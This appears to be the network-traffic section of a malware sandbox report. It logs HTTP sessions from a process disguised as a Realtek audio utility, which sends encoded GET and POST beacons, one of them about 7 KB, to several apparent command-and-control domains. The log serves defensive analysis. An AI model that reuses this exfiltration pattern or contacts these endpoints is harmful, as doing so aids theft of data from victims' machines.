AuPF3v=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfsayDOuE5AL4vfRpziRnJzoKpDw/4p1OlOiFvkXXcV9Oq9gMcmxBbTgORoLXR7of0kN8tTeByFK86oMQHxVmB0j5IVonPd89RNTxDuaOfsJnI60tN5GdYc/4F6WLdI4P179k4wM57XkRtEd6zu2I2ugXMMLMZpq6Oyc+TwOkw/0GjcFBCD7QdCaNeTa9AZBFqq35qYMM1SMTlRWhXzLAZlFKIHILLIsa1pfYJ+VvKwUS3bVX1aSlqCzxHuskXQRgIcxUWJGfrNvCqPxbSdVH6EMztJMTXiocU20FGmUz3CWIAU+zmxLXYWK2/ftE0etZ3pNfyL/+cpWwy/VcQDV7Gq5GxCACrfZE7opOuKVfxHEzlzXSUkt19ht+DE0yksgKNQ2jthDH/A32PPzB5myuFgwMd6jCDUtCcTfi0vPJ1rRJg0A86S1KO6SJ209X85C2XpL8Ms57F6bCOdSUNNlYEa5Ngk6yq5gHRl9b/rHfxMDt+N6jXi2EhDR1EQ22P0l63H0Unr/CVTCWStQZGwiaVmxLZyCys/PCKDchCvrRfN8xMPcul2AKPxLotGE53zhoeOpTcdUXLTGiDnjrJRlxtI1cSHWSRCYnRY12ix73om2423CDf+1l0ECju4o3MUw4Zvnqp1zP7dABrBcS7mUTBcGI1fbWs2kItZs0LHxeix/nHdwozmGa/ZPJ9o/qTDYENdqIEvUfbd8O92t9OBtpcBT2RjjhvjReT175Sdrr5tNucg+saYM9wd63Q16rJXd3LK4MOBYsBxQEibHEfeLqzVgOiidz2IscMTJ44PFv+UcUK5O3hUNMr1OEg6V7G/L3zUZFKa3yBeM3Qqh6qjTOiTRNNPP8PbNsf49WSm7lKcRXBVdfsDZVV+OATcjz+LmbZVyqn9JkhY8WJDa/0nqDkzZx91ISfUftWJj817AFZjf0akeehHVq7uEIWUlfR7tb/Nxv [TRUNCATED]
Jan 13, 2025 10:21:31.472429991 CET	5384	OUT	Data Raw: 4f 5a 43 76 66 67 43 74 73 70 4a 53 45 49 70 52 70 72 2f 48 69 52 6b 78 6d 79 35 75 6a 46 79 53 6a 2f 5a 4b 52 56 74 56 6d 2f 63 75 63 37 48 54 61 31 36 4c 47 66 72 37 31 76 75 4f 4e 53 74 61 53 37 4f 6a 63 38 34 51 4b 59 46 4e 67 61 55 76 33 62 Data Ascii: OZCvfgCtspJSEIpRpr/HiRkxmy5ujFySj/ZKRVtVm/cuc7HTa16LGfr71vuONStaS7Ojc84QKYFNgaUv3b8dB2EhEL+CTRNFTCfcYxjECc94VTPbTUj7ac17b0ROdOMxZ5cSbT2ovBOxwGQk+jNW2uyMV+g/0oVhrR0kG5jzAglKXq1fJt3a7UoAYGKG2GkrnhshBjigkRag29BQOf+p9VJuLYtqcL0/hPkmw8RDo87C9nlBTbP
Jan 13, 2025 10:21:31.607458115 CET	805	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Mon, 13 Jan 2025 09:21:31 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 db 72 9b 30 10 7d cf 57 50 1e 32 ed 4c 6d 2e be c5 0d a4 93 50 5f 4b ec c4 71 82 ed 97 8c 90 14 4b 44 48 14 04 d8 e9 f4 df 0b a6 13 d3 71 1f aa 07 a4 5d 76 cf ee 39 2b 59 1f be cd 9d e5 fa 6e a0 10 19 b2 ab 33 ab dc 14 06 f8 d6 56 31 57 af ce 94 62 59 04 03 54 1d 0f 66 88 25 50 20 01 71 82 a5 ad 3e 2e 87 8d 8b 3f 91 c7 df 44 ca a8 81 7f a4 34 b3 d5 5d 23 05 0d 28 c2 08 48 ea 33 ac 2a 50 70 89 79 91 3b 19 d8 18 6d f1 49 36 07 21 b6 d5 8c e2 3c 12 b1 ac 25 e4 14 49 62 23 9c 51 88 1b 07 e3 b3 42 39 95 14 b0 46 02 01 c3 b6 d1 d4 eb 70 92 4a 86 af 2c ad da 0f 74 0e 4d 72 91 c0 98 46 f2 48 eb df bd c7 f8 25 c6 09 a9 b5 a0 5f a6 31 b3 4b 7e 5f 34 2d cf f3 9e de 84 84 c6 a2 c9 68 86 35 55 d1 8e 90 96 76 5a c6 3a a8 57 97 e7 b4 44 e7 ff 4a 58 da 71 30 96 2f d0 5e 11 9c 09 80 6c 15 89 e7 ea f8 f1 53 5d 8c 8a b2 22 f7 51 a1 ae c4 3b a9 05 20 03 95 b7 16 57 2a f1 92 72 28 a9 e0 4a 0d 4a f9 f9 ae 5f 19 52 ae 9c 72 24 f2 a6 14 51 93 09 58 cc 57 f0 26 29 08 29 b6 [TRUNCATED] Data Ascii: 265Sr0}WP2Lm.P_KqKDHq]v9+Yn3V1WbYTf%P q>.?D4]#(H3Ppy;mI6!<%Ib#QB9FpJ,tMrFH%_1K~_4-h5UvZ:WDJXq0/^lS]"Q; Wr(JJ_Rr$QXW&))%uy46znbxk;W:5zJ]WSl>AZ^dZn8`5p1EFb;/$4bO/'MX^-"lgxd$;kMlO:\|'p#-i7t`4LzVzt~[VVkgo0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49774	45.56.79.23	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:34.126534939 CET	528	OUT	GET /jwa9/?AuPF3v=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&v1GdZ=vUN3 HTTP/1.1 Host: www.chiro.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:21:34.260377884 CET	1289	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Mon, 13 Jan 2025 09:21:34 GMT content-type: text/html transfer-encoding: chunked connection: close Data Raw: 34 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 63 68 69 72 6f 2e 6c [TRUNCATED] Data Ascii: 495<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.chiro.live/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.chiro.live/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736760094.0055048437&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiYXJncyI6ICJBdVBGM3Y9bmJFYjZCYXBqckNZZDN2cElVNjVkUlRhb1BLMmM0ODRaOURMZWxUY3JKNHA4aE9pQnBsSTM5enR6aGFhbDc2cUZZS2U4b29KRjIybUkvSnZSUFI5S1p0RVBzR1BTWnZwSHo0Z0tSYjlSSHRpdjg3U1p3eE15SWs9JnYxR2RaPXZVTjMiLCAicmVmZXJlciI6ICIiLCAiYWNjZXB0IjogInRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45 [TRUNCATED]
Jan 13, 2025 10:21:34.260425091 CET	52	IN	Data Raw: 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: } </script> </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49775	104.21.16.1	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:40.018374920 CET	799	OUT	POST /3u0p/ HTTP/1.1 Host: www.mzkd6gp5.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.mzkd6gp5.top Referer: http://www.mzkd6gp5.top/3u0p/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 34 58 4a 33 6e 47 45 56 43 58 2f 32 6c 38 56 62 72 69 46 4a 36 52 38 58 54 6f 57 30 43 6f 45 57 75 58 67 37 37 4f 6b 70 7a 57 6e 7a 63 50 37 48 4c 35 47 50 76 48 6c 71 6d 66 6b 6e 67 67 32 6f 42 6a 73 30 65 31 4d 59 75 53 6e 67 70 6a 36 61 67 48 64 4e 56 35 65 76 37 62 7a 70 45 76 50 53 62 38 44 31 73 7a 6c 45 4c 68 72 2f 2b 66 2b 58 55 77 6a 4c 38 71 79 50 6a 30 45 34 2b 65 38 6b 39 46 69 31 48 4c 45 6f 47 78 36 35 7a 57 77 6d 61 33 6f 4f 46 37 73 77 76 31 51 31 34 52 75 66 6f 5a 65 49 76 53 57 69 51 76 61 4d 32 34 4a 4d 34 50 46 54 48 77 3d 3d Data Ascii: AuPF3v=h0wTz0QM+szd4XJ3nGEVCX/2l8VbriFJ6R8XToW0CoEWuXg77OkpzWnzcP7HL5GPvHlqmfkngg2oBjs0e1MYuSngpj6agHdNV5ev7bzpEvPSb8D1szlELhr/+f+XUwjL8qyPj0E4+e8k9Fi1HLEoGx65zWwma3oOF7swv1Q14RufoZeIvSWiQvaM24JM4PFTHw==
Jan 13, 2025 10:21:40.593661070 CET	915	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:21:40 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uon%2FBQspi1fywd9G0%2Bj4UqumOYeRz%2BqnO76zw0jzyn6NedVUHQaNlmf9wKUFSzMro8GmB5DfWFbbOuXrcnpitHiV%2BpPOYSK4OYaeLzMSbP71E%2Fa9Tbd7n5hnngoZGILSWN6C"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901451416c6b82b1-IAD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=100513&min_rtt=100513&rtt_var=50256&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Jan 13, 2025 10:21:40.593681097 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49776	104.21.16.1	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:42.641793013 CET	819	OUT	POST /3u0p/ HTTP/1.1 Host: www.mzkd6gp5.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.mzkd6gp5.top Referer: http://www.mzkd6gp5.top/3u0p/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 63 57 74 79 63 37 70 2f 6b 70 79 57 6e 7a 46 2f 37 4f 57 4a 47 45 76 48 5a 49 6d 62 6b 6e 67 67 79 6f 42 68 30 30 66 45 4d 62 76 43 6e 69 6d 44 36 59 76 6e 64 4e 56 35 65 76 37 62 6d 4d 45 72 6a 53 59 4e 7a 31 74 53 6c 48 43 42 72 38 75 76 2b 58 44 67 6a 50 38 71 7a 63 6a 32 77 65 2b 59 67 6b 39 45 79 31 48 65 6f 72 52 42 36 2f 33 57 78 70 4c 31 5a 47 4a 34 49 59 6a 6d 49 75 79 55 32 4c 70 50 54 53 79 67 69 47 54 38 47 2b 79 49 77 6b 36 4e 45 49 61 35 51 6e 2f 42 66 68 44 71 33 36 6f 2b 37 77 75 69 4f 64 30 6a 6f 3d Data Ascii: AuPF3v=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDecWtyc7p/kpyWnzF/7OWJGEvHZImbknggyoBh00fEMbvCnimD6YvndNV5ev7bmMErjSYNz1tSlHCBr8uv+XDgjP8qzcj2we+Ygk9Ey1HeorRB6/3WxpL1ZGJ4IYjmIuyU2LpPTSygiGT8G+yIwk6NEIa5Qn/BfhDq36o+7wuiOd0jo=
Jan 13, 2025 10:21:43.225615025 CET	913	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:21:43 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p6NUtOUuKUEdjC4PF9cY7rxleh7BXC2BiUjZHuGVKQWlYE7YHDbHujUaNiaPYvoZu4MN71YY%2Bf%2FZRwNcnZOrIlZOGYF%2FPfuf%2FrCGotJGU3hnh9OPDsr6PrlyY9fb4KKFZ0pR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90145151dc1fc9b0-IAD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=100429&min_rtt=100429&rtt_var=50214&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=819&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Jan 13, 2025 10:21:43.225682974 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49777	104.21.16.1	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:45.266153097 CET	2578	OUT	POST /3u0p/ HTTP/1.1 Host: www.mzkd6gp5.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.mzkd6gp5.top Referer: http://www.mzkd6gp5.top/3u0p/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 55 57 75 48 51 37 37 6f 77 70 31 57 6e 7a 4e 66 37 4c 57 4a 47 5a 76 48 78 4d 6d 62 68 63 67 69 36 6f 42 41 55 30 59 32 30 62 6d 43 6e 69 74 6a 36 62 67 48 64 59 56 35 4f 56 37 62 32 4d 45 72 6a 53 59 4f 72 31 71 44 6c 48 45 42 72 2f 2b 66 2b 4c 55 77 6a 33 38 71 72 4d 6a 32 30 52 2f 75 51 6b 39 6b 43 31 45 6f 63 72 54 68 36 39 77 57 77 32 4c 31 56 4a 4a 34 6b 55 6a 6a 63 55 79 54 71 4c 6f 6f 32 37 6d 6c 44 46 4f 4f 32 47 31 37 51 44 74 66 63 63 55 4b 6b 2b 2f 69 65 41 63 66 48 53 68 73 4c 77 38 52 4c 58 6c 30 76 55 78 6c 33 63 62 79 31 50 53 6b 71 44 72 4b 6b 71 62 43 58 62 6c 61 4a 2f 32 55 32 6a 46 61 43 63 76 33 71 6e 54 43 75 61 58 69 69 68 71 71 51 4f 4a 73 6f 4e 6d 56 35 53 58 45 51 6a 73 61 76 76 44 66 79 32 44 68 4c 4a 59 4a 6c 2f 44 39 61 63 6e 44 62 6d 78 53 44 65 69 72 6e 59 4c 71 33 57 79 68 6a 4a 45 6d 75 34 49 38 32 30 35 67 45 46 31 41 59 [TRUNCATED] Data Ascii: AuPF3v=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDeUWuHQ77owp1WnzNf7LWJGZvHxMmbhcgi6oBAU0Y20bmCnitj6bgHdYV5OV7b2MErjSYOr1qDlHEBr/+f+LUwj38qrMj20R/uQk9kC1EocrTh69wWw2L1VJJ4kUjjcUyTqLoo27mlDFOO2G17QDtfccUKk+/ieAcfHShsLw8RLXl0vUxl3cby1PSkqDrKkqbCXblaJ/2U2jFaCcv3qnTCuaXiihqqQOJsoNmV5SXEQjsavvDfy2DhLJYJl/D9acnDbmxSDeirnYLq3WyhjJEmu4I8205gEF1AY3Ag5Kkz75E/mEKZjz01eEkFXxojxw0FeKHzJ1V4+ZUcUd4WhaWChZgq4FajJd685UHl+YEXVCbdHd8x6vEraU/inpWqlaWdOxrCRSMHtdn2vcTQAHUqyHTkE1BzBSQbzYwtPJPvLbTJAoMBVFaDvQy/WAgeRlnkW/mkYJmkQmgDzh9i5CFlGT32cTcqgKss25fo4zszhZyoBzKd0fAJEbCRwdyRo+7JlvahzmFHhQB4kG0FlskL9tAQhWfs+5h1UUHP36bT+WbKLjUF3yIFHGBUjCcNh51MBshWtjFQC/gem2ps/AJ7SnwRfryQHVQXmmfILcXp4qYgYNGZY41XVmH+u5plDlO2kZ5APyQc6tntNl2UD1nfOXD59f+bCqKp9Jy950Qhb1Cd05qv0i4Mcpy3XRjkKaCU7+63eEmJjMYWpx2FTIzBZh8YC3Oi2nPPRkeaTWuTr+VM64cmHCt/uzJ34ZuR18nq9HHt3IuWxTA06MuqlP5QTwFPkTEDfsvzViuN4i1rjdpTm3ec1axfUBklphCF3A3XXz09uL2V+9/gxKJXZaVD2MX3HTo7/wJBxnddqzgEsi00VADtBAX+/17I8RjlFYtBBTfVyeVwlP5qxrsay3lk+9J0mINgw8RWgNYY+Dj4qgSrJ585lRJ1YpbM4rhhohgkXpy [TRUNCATED]
Jan 13, 2025 10:21:45.266256094 CET	5390	OUT	Data Raw: 56 71 77 32 32 73 4d 66 6c 4d 35 39 79 41 39 4f 4b 2f 53 52 46 61 37 42 37 57 52 2f 33 30 57 7a 58 67 63 69 6d 76 44 7a 49 71 65 70 35 2f 67 59 68 2b 53 61 2f 61 55 4f 35 70 6c 38 67 68 47 57 51 6b 47 45 4e 4f 63 36 5a 2f 59 33 6b 7a 77 6e 7a 75 Data Ascii: Vqw22sMflM59yA9OK/SRFa7B7WR/30WzXgcimvDzIqep5/gYh+Sa/aUO5pl8ghGWQkGENOc6Z/Y3kzwnzuLP+BQevab1BQL6Wvmcl47ytt7GKrJeTNJpJzYE6UETuJOWsFdwWbFl3nID9aMo0CBS0TKTeDK4KwxIl4j0+KvD0lxrwdVSjpt7Fuu04aOsplYuI5zvlmKj3Ll3NbqhPuNcVEmG8+SdWjMsSaJemQp3ISj3enZcxmO
Jan 13, 2025 10:21:45.844710112 CET	914	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:21:45 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yIuPNt9L6TlLRkIoNruQbNKg4USH3hxDh7R2cEq1VgN2jJW0nv5vZL2O7GJ3Q7X9AF9kqU5wtxfd9jjgiInibav%2Bztq5Km6Pl%2BK4iMzJpj1ugMqT9%2FMFxdWnhmatbEP7%2B43v"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901451623db80634-IAD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=100388&min_rtt=100388&rtt_var=50194&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7968&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Jan 13, 2025 10:21:45.844770908 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.11.20	49778	104.21.16.1	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:47.889254093 CET	530	OUT	GET /3u0p/?v1GdZ=vUN3&AuPF3v=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ= HTTP/1.1 Host: www.mzkd6gp5.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:21:48.457315922 CET	772	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:21:48 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y5GNVlG%2B86omIiWY1E%2BqPDm%2B9MawDHBf2LZTn1oGCjPXZo6zFHDj3GDAXRAC0H9xyylPIn0v0EZuqSoxP79hF9sND1FzMDFNbcCa3lmfF3cwHP6HY5AeOx9KabCLwnPWYcEd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901451729efe0634-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=100159&min_rtt=100159&rtt_var=50079&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=530&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 13, 2025 10:21:48.457370996 CET	152	IN	Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Jan 13, 2025 10:21:48.457412004 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.11.20	49779	199.192.21.169	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:53.749260902 CET	793	OUT	POST /qps0/ HTTP/1.1 Host: www.bokus.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.bokus.site Referer: http://www.bokus.site/qps0/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 32 4a 72 77 2f 65 56 54 2f 50 6a 54 68 4b 76 32 56 2b 4e 63 59 49 55 59 64 47 4c 71 62 67 50 74 6b 43 69 39 74 79 38 5a 30 6d 68 73 47 38 32 2b 73 6b 67 6c 79 4d 6f 6f 53 73 6c 36 4f 31 51 61 69 50 4a 63 32 63 70 39 4b 48 5a 4e 6f 46 4e 58 4a 5a 31 35 4c 6c 44 6d 34 43 32 51 5a 4d 48 6b 37 47 50 33 5a 75 6b 55 78 72 4f 6b 49 65 56 30 59 31 32 5a 6a 68 67 67 55 39 6d 46 2b 57 44 56 63 63 4b 44 48 4b 37 36 31 58 72 41 75 4b 76 68 35 7a 6d 70 39 45 39 43 4b 2f 7a 47 75 4e 6c 31 62 56 67 74 66 39 6c 6a 4d 4e 43 68 36 70 66 76 64 49 63 42 76 41 3d 3d Data Ascii: AuPF3v=lcXtcPN+FJHJ2Jrw/eVT/PjThKv2V+NcYIUYdGLqbgPtkCi9ty8Z0mhsG82+skglyMooSsl6O1QaiPJc2cp9KHZNoFNXJZ15LlDm4C2QZMHk7GP3ZukUxrOkIeV0Y12ZjhggU9mF+WDVccKDHK761XrAuKvh5zmp9E9CK/zGuNl1bVgtf9ljMNCh6pfvdIcBvA==
